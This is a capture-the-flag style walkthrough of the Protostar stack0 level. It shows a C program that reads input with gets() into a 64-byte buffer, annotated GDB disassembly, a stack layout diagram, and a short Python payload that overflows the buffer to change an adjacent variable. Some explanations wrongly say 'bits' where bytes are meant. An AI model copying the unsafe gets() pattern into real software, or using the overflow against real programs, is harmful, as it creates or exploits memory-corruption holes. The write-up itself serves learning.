Hello Guyz,
In This Post, I am going to show you how we can win protostar stack0 level. basically, here Our main Goal is To Understand How A Program Practically Works, And How Can We Understand Every Concept Very Clearly.
Before Starting This Walkthrough. I want to highlight Few Points.
- I'm not the creator of protostar war game. I am just a player.
- Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
- For Practical Hint, Check YouTube Video Given Below.
Source Code :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | #include <stdlib.h> #include <unistd.h> #include <stdio.h>
int main(int argc, char **argv) { volatile int modified; char buffer[64];
modified = 0; gets(buffer);
if(modified != 0) { printf("you have changed the 'modified' variable\n"); } else { printf("Try again?\n"); } }
|
Disassembly Of Main Function (Using GDB)
########################################################################################################
[ System Has Created Space For 60 Bits In hEx and 96 in Decimal Space On Stack]
########################################################################################################
[-------------------------------------code-------------------------------------]
0x80483f5 <main+1>: mov ebp,esp <<=== Save Base Pointer Onto Stack
0x80483f7 <main+3>: and esp,0xfffffff0
0x80483fa <main+6>: sub esp,0x60 <<=== This Instruction to Create Space of 96-Bits in Stack,
=> 0x80483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0 <<=== Here, This Instruction is to Insert 0 Into 92-96 Bits,
0x8048405 <main+17>: lea eax,[esp+0x1c] <<=== This Instruction is To Copy address of 28 bits starting
point from 96 bits Into EAX registers From There, move it
to stack so That it will work as a argument for get command.
0x8048409 <main+21>: mov DWORD PTR [esp],eax <<=== Copy Eax into stack
0x804840c <main+24>: call 0x804830c <gets@plt> <<=== Perform Get Command
0x8048411 <main+29>: mov eax,DWORD PTR [esp+0x5c] <<=== Get Value Of 92-96 bits and move it to EAX register
Situation On Stack
0 28 92 96
============================================================================================
Other Things | Buffer(64) | modified |
============================================================================================
^ ^
| |
Get Overwrites from here +
Target Area
Exploit
#!/usr/bin/python
# Total Size Of Buffer In Stack 60c
# 0x80483fa <main+6>: sub esp,0x60 ==> 96 In Decimal
# 0x8048405 <main+17>: lea eax,[esp+0x1c]
# 0x804840c <main+24>: call 0x804830c <gets@plt>
# 0x80483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0
payload = 'a'*64 # Buffer Variable Value
payload+= 'b'*4 # Modified Variable Value
# ./bin/stack0 < tmp
print payload
For More Detailed Walk through Check Below Provided YouTube Video Playlist